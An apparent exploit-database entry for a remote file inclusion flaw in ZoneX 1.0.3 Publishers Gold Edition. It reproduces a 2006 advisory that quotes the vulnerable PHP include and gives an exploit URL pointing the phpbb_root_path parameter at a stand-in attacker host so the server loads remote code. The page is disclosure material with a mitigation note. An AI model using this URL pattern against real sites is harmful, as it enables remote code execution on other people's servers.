header-logo
Suggest Exploit
vendor:
Publishers Gold Edition
by:
xoron
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Publishers Gold Edition
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ZoneX 1.0.3 – Publishers Gold Edition Remote File Inclusion Vulnerability

ZoneX 1.0.3 - Publishers Gold Edition is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the phpbb_root_path parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
#ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: ZoneX 1.0.3 - Publishers Gold Edition
-
#Class : Remote
-
#cont@ct: x0r0n[at]hotmail[dot]com
-
#CODE:    include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx)
-
#Exploit: http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

# milw0rm.com [2006-08-07]

Navigation

Suggest Exploit

Services By CQR